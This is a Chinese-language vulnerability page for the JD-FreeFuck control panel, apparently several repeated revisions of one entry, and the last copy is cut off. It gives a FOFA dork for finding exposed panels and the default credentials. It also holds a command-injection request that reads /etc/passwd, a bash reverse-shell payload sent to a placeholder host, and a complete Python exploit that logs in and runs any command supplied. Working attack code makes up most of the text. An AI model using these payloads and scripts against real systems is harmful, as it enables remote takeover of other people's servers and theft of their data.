# JD-FreeFuck 後台命令執行漏洞
==FOFA==
title="京东薅羊毛控制面板"
useradmin/supermanito
POST /runCmd HTTP/1.1 Host: 101.200.189.251:5678 Content-Length: 50 Pragma: no-cache Cache-Control: no-cache Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U Connection: close cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
==Getshell==
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
https://www.secquan.org/Discuss/1071932#reply3
https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
==FOFA==
title="京东薅羊毛控制面板"
useradmin/supermanito
POST /runCmd HTTP/1.1 Host: 101.200.189.251:5678 Content-Length: 50 Pragma: no-cache Cache-Control: no-cache Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U Connection: close cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
==Getshell==
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
https://www.secquan.org/Discuss/1071932#reply3
https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
==FOFA==
title="京东薅羊毛控制面板"
useradmin/supermanito
發送如下請求包執行命令:
POST /runCmd HTTP/1.1 Host: 101.200.189.251:5678 Content-Length: 50 Pragma: no-cache Cache-Control: no-cache Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U Connection: close cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
其中 cmd 參數存在命令注入。
==Getshell==
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
https://www.secquan.org/Discuss/1071932#reply3
https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
==FOFA==
title="京东薅羊毛控制面板"
useradmin/supermanito
發送如下請求包執行命令:
POST /runCmd HTTP/1.1 Host: XXX.XXX.XXX.XXX:5678 Content-Length: 50 Pragma: no-cache Cache-Control: no-cache Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U Connection: close cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
其中 cmd 參數存在命令注入。
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
== POC & EXP ==
import requests
import json
def login(url,username=”useradmin”,password=”supermanito”):
loginReq = requests.Session()
payload = {
“username”:username,
“password”:password
}
headers1 = {
“Accept”: “*/*”,
“User-Agent”:”Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36″,
“Content-Type”:”application/x-www-form-urlencoded; charset=UTF-8″,
“Accept-Encoding”: “gzip, deflate”,
“Accept-Language”: “zh-CN,zh;q=0.9”
}
headers = {
“Accept”: “*/*”,
“X-Requested-With”: “XMLHttpRequest”,
“User-Agent”:”Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36″,
“Content-Type”:”application/x-www-form-urlencoded; charset=UTF-8″,
“Origin”: url,
“Referer”: url,
“Accept-Encoding”: “gzip, deflate”,
“Accept-Language”: “zh-CN,zh;q=0.9”
}
loginReq.get(url, headers=headers1)
content = loginReq.post(url + “auth”,data=payload,headers=headers)
response = json.loads(content.text)
# print(response[“err”])
# print(loginReq.cookies)
if response[“err”] == 0:
print(“login success”)
return(loginReq)
else:
print(“login failure”)
raise RuntimeError(“Can’t login,beacuse -> “+response[“msg”])
def exploit(url,session,command):
”’ POST form looks likePOST /runCmd HTTP/1.1
Host: XXX.XXX.XXX.XXXX:5678
Content-Length: 51
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc
Connection: close
cmd=bash+jd.sh+bean_change%3Bifconfig%3B&delay=1000
”’ headers = {
“Accept”: “*/*”,
“X-Requested-With”: “XMLHttpRequest”,
“User-Agent”:”Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36″,
“Content-Type”:”application/x-www-form-urlencoded; charset=UTF-8″,
“Accept-Encoding”: “gzip, deflate”,
“Accept-Language”: “zh-CN,zh;q=0.9”,
“Connection”: “close”
}
datas = {
“cmd”:”bash+jd.sh+bean_change;”+command+”;”,
“delay”:”1000″
}
session.get(url+”home”,headers=headers)
session.get(url+”run”,headers=headers)
session.get(url+”runCmd”,headers=headers)
response = session.post(url+”runCmd”,data=datas,headers=headers)
# print(session.cookies)
objectResponse = json.loads(response.text)
# print(objectResponse)
if objectResponse[“err”] == 0:
print(“execute success”,”\n”)
print(“$ “+command)
for line in objectResponse[“msg”].split(“\n”)[1:-1]:
print(line)
else:
print(“execute failure”)
raise RuntimeError(“Can’t execute –> “+objectResponse[“msg”])
url = “
http://ip:port/ ”exploit(url,login(url),”ifconfig”)
https://www.secquan.org/Discuss/1071932#reply3
https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
==FOFA==
title="京东薅羊毛控制面板"
useradmin/supermanito
發送如下請求包執行命令:
POST /runCmd HTTP/1.1 Host: XXX.XXX.XXX.XXX:5678 Content-Length: 50 Pragma: no-cache Cache-Control: no-cache Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U Connection: close cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
其中 cmd 參數存在命令注入。
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
== POC & EXP ==
import requests
import json
def login(url,username="useradmin",password="supermanito"):
loginReq = requests.Session()
payload = {
"username":username,
"password":password
}
headers1 = {
"Accept": "*/*",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}
headers = {
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin": url,
"Referer": url,
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}
loginReq.get(url, headers=headers1)
content = loginReq.post(url + "auth",data=payload,headers=headers)
response = json.loads(content.text)
# print(response["err"])
# print(loginReq.cookies)
if response["err"] == 0:
print("login success")
return(loginReq)
else:
print("login failure")
raise RuntimeError("Can't login,beacuse -> "+response["msg"])
def exploit(url,session,command):
''' POST form looks like
POST /runCmd HTTP/1.1
Host: XXX.XXX.XXX.XXXX:5678
Content-Length: 51
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc
Connection: close
cmd=bash+jd.sh+bean_change%3Bifconfig%3B&delay=1000
'''
headers = {
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "close"
}
datas = {
"cmd":"bash+jd.sh+bean_change;"+command+";",
"delay":"1000"
}
session.get(url+"home",headers=headers)
session.get(url+"run",headers=headers)
session.get(url+"runCmd",headers=headers)
response = session.post(url+"runCmd",data=datas,headers=headers)
# print(session.cookies)
objectResponse = json.loads(response.text)
# print(objectResponse)
if objectResponse["err"] == 0:
print("execute success","\n")
print("$ "+command)
for line in objectResponse["msg"].split("\n")[1:-1]:
print(line)
else:
print("execute failure")
raise RuntimeError("Can't execute --> "+objectResponse["msg"])
url = "http://ip:port/ "
exploit(url,login(url),"ifconfig")
https://www.secquan.org/Discuss/1071932#reply3
https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
==FOFA==
title="京东薅羊毛控制面板"
useradmin/supermanito
發送如下請求包執行命令:
POST /runCmd HTTP/1.1 Host: XXX.XXX.XXX.XXX:5678 Content-Length: 50 Pragma: no-cache Cache-Control: no-cache Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U Connection: close cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
其中 cmd 參數存在命令注入。
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
== POC & EXP ==
import requests
import json
def login(url,username="useradmin",password="supermanito"):
loginReq = requests.Session()
payload = {
"username":username,
"password":password
}
headers1 = {
"Accept": "*/*",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}
headers = {
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin": url,
"Referer": url,
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}
loginReq.get(url, headers=headers1)
content = loginReq.post(url + "auth",data=payload,headers=headers)
response = json.loads(content.text)
# print(response["err"])
# print(loginReq.cookies)
if response["err"] == 0:
print("login success")
return(loginReq)
else:
print("login failure")
raise RuntimeError("Can't login,beacuse -> "+response["msg"])
def exploit(url,session,command):
''' POST form looks like
POST /runCmd HTTP/1.1
Host: XXX.XXX.XXX.XXXX:5678
Content-Length: 51
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc
Connection: close
cmd=bash+jd.sh+bean_change%3Bifconfig%3B&delay=1000
'''
headers = {
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "close"
}
datas = {
"cmd":"bash+jd.sh+bean_change;"+command+";",
"delay":"1000"
}
session.get(url+"home",headers=headers)
session.get(url+"run",headers=headers)
session.get(url+"runCmd",headers=headers)
response = session.post(url+"runCmd",data=datas,headers=headers)
# print(session.cookies)
objectResponse = json.loads(response.text)
# print(objectResponse)
if objectResponse["err"] == 0:
print("execute success","\n")
print("$ "+command)
for line in objectResponse["msg"].split("\n")[1:-1]:
print(line)
else:
print("execute failure")
raise RuntimeError("Can't execute --> "+objectResponse["msg"])
url = "http://ip:port/ "
exploit(url,login(url),"ifconfig")
https://www.secquan.org/Discuss/1071932#reply3
https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
==FOFA==
title="京东薅羊毛控制面板"
useradmin/supermanito
發送如下請求包執行命令:
POST /runCmd HTTP/1.1 Host: XXX.XXX.XXX.XXX:5678 Content-Length: 50 Pragma: no-cache Cache-Control: no-cache Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U Connection: close cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
其中 cmd 參數存在命令注入。
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
==EXP==
====Usage:====
python3 exploit.py -u http://xx.xx.xx.xx:5678 -c "command" python3 exploit.py -u http://127.0.0.1:5678 -c "cat /etc/passwd"
import requests
import json
import sys
import argparse
def login(url,username="useradmin",password="supermanito"):
loginReq = requests.Session()
payload = {
"username":username,
"password":password
}
headers1 = {
"Accept": "*/*",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}
headers = {
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin": url,
"Referer": url,
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}
loginReq.get(url, headers=headers1)
content = loginReq.post(url + "auth",data=payload,headers=headers)
response = json.loads(content.text)
# print(response["err"])
# print(loginReq.cookies)
if response["err"] == 0:
print("login success")
return(loginReq)
else:
print("login failure")
raise RuntimeError("Can't login,beacuse -> "+response["msg"])
def exploit(url,session,command):
''' POST form looks like
POST /runCmd HTTP/1.1
Host: XXX.XXX.XXX.XXXX:5678
Content-Length: 51
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc
Connection: close
cmd=bash+jd.sh+bean_change%3Bifconfig%3B&delay=1000
'''
headers = {
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "close"
}
datas = {
"cmd":"bash+jd.sh+bean_change;"+command+";",
"delay":"1000"
}
response = session.post(url+"runCmd",data=datas,headers=headers)
# print(session.cookies)
objectResponse = json.loads(response.text)
# print(objectResponse)
if objectResponse["err"] == 0:
print("execute success","\n")
print(objectResponse)
print("$ "+command)
for line in objectResponse["msg"].split("\n"):
print(line)
else:
print("execute failure")
raise RuntimeError("Can't execute --> "+objectResponse["msg"])
if __name__ == "__main__" :
parser = argparse.ArgumentParser(description='this is the EXP of JD fuck')
parser.add_argument("-u",metavar="url",type=str,help="url there, e.g: http://127.0.0.1:5678/")
parser.add_argument("-c",metavar="command",type=str,help="execute command, e.g: ls")
# print(sys.argv[1:])
args = vars( parser.parse_args(sys.argv[1:]) )
url = args["u"]
command = args["c"]
exploit(url,login(url),command)
https://www.secquan.org/Discuss/1071932#reply3
https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
==FOFA==
title="京东薅羊毛控制面板"
useradmin/supermanito
發送如下請求包執行命令:
POST /runCmd HTTP/1.1 Host: XXX.XXX.XXX.XXX:5678 Content-Length: 50 Pragma: no-cache Cache-Control: no-cache Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U Connection: close cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
其中 cmd 參數存在命令注入。
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
==EXP==
====Usage:====
python3 exploit.py -u http://xx.xx.xx.xx:5678 -c "command" python3 exploit.py -u http://127.0.0.1:5678 -c "cat /etc/passwd"
import requests
import json
import sys
import argparse
def login(url,username="useradmin",password="supermanito"):
loginReq = requests.Session()
payload = {
"username":username,
"password":password
}
headers1 = {
"Accept": "*/*",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}
headers = {
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin": url,
"Referer": url,
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}
loginReq.get(url, headers=headers1)
content = loginReq.post(url + "auth",data=payload,headers=headers)
response = json.loads(content.text)
# print(response["err"])
# print(loginReq.cookies)
if response["err"] == 0:
print("login success")
return(loginReq)
else:
print("login failure")
raise RuntimeError("Can't login,beacuse -> "+response["msg"])
def exploit(url,session,command):
''' POST form looks like
POST /runCmd HTTP/1.1
Host: XXX.XXX.XXX.XXXX:5678
Content-Length: 51
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc
Connection: close
cmd=bash+jd.sh+bean_change%3Bifconfig%3B&delay=1000
'''
headers = {
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "close"
}
datas = {
"cmd":"bash+jd.sh+bean_change;"+command+";",
"delay":"1000"
}
response = session.post(url+"runCmd",data=datas,headers=headers)
# print(session.cookies)
objectResponse = json.loads(response.text)
# print(objectResponse)
if objectResponse["err"] == 0:
print("execute success","\n")
print(objectResponse)
print("$ "+command)
for line in objectResponse["msg"].split("\n"):
print(line)
else:
print("execute failure")
raise RuntimeError("Can't execute --> "+objectResponse["msg"])
if __name__ == "__main__" :
parser = argparse.ArgumentParser(description='this is the EXP of JD fuck')
parser.add_argument("-u",metavar="url",type=str,help="url there, e.g: http://127.0.0.1:5678/")
parser.add_argument("-c",metavar="command",type=str,help="execute command, e.g: ls")
# print(sys.argv[1:])
args = vars( parser.parse_args(sys.argv[1:]) )
url = args["u"]
command = args["c"]
exploit(url,login(url),command)
https://www.secquan.org/Discuss/1071932#reply3
https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
https://github.com/Esonhugh/JD-Freefuckfucker : exp/poc
==FOFA==
title="京东薅羊毛控制面板"
useradmin/supermanito
發送如下請求包執行命令:
POST /runCmd HTTP/1.1 Host: XXX.XXX.XXX.XXX:5678 Content-Length: 50 Pragma: no-cache Cache-Control: no-cache Accept: */* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U Connection: close cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
其中 cmd 參數存在命令注入。
cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500
==EXP==
====Usage:====
python3 exploit.py -u http://xx.xx.xx.xx:5678 -c "command" python3 exploit.py -u http://127.0.0.1:5678 -c "cat /etc/passwd"
import requests
import json
import sys
import argparse
def login(url,username="useradmin",password="supermanito"):
loginReq = requests.Session()
payload = {
"username":username,
"password":password
}
headers1 = {
"Accept": "*/*",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}
headers = {
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Origin": url,
"Referer": url,
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9"
}
loginReq.get(url, headers=headers1)
content = loginReq.post(url + "auth",data=payload,headers=headers)
response = json.loads(content.text)
# print(response["err"])
# print(loginReq.cookies)
if response["err"] == 0:
print("login success")
return(loginReq)
else:
print("login failure")
raise RuntimeError("Can't login,beacuse -> "+response["msg"])
def exploit(url,session,command):
''' POST form looks like
POST /runCmd HTTP/1.1
Host: XXX.XXX.XXX.XXXX:5678
Content-Length: 51
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc
Connection: close
cmd=bash+jd.sh+bean_change%3Bifconfig%3B&delay=1000
'''
headers = {
"Accept": "*/*",
"X-Requested-With": "XMLHttpRequest",
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
"Accept-Encoding": "gzip, deflate",
"Accept-Language": "zh-CN,zh;q=0.9",
"Connection": "close"
}
datas = {
"cmd":"bash+jd.sh+bean_change;"+command+";",
"delay":"1000"
}
response = session.post(url+"runCmd",data=datas,headers=headers)
# print(session.cookies)
objectResponse = json.loads(response.text)
# print(objectResponse)
if objectResponse["err"] == 0:
print("execute success","\n")
print(objectResponse)
print("$ "+command)
for line in objectResponse["msg"].split("\n"):
print(line)
else:
print("execute failure")
raise RuntimeError("Can't execute --> "+objectResponse["msg"])
if __name__ == "__main__" :
parser = argparse.ArgumentParser(description='this is the EXP of JD fuck')
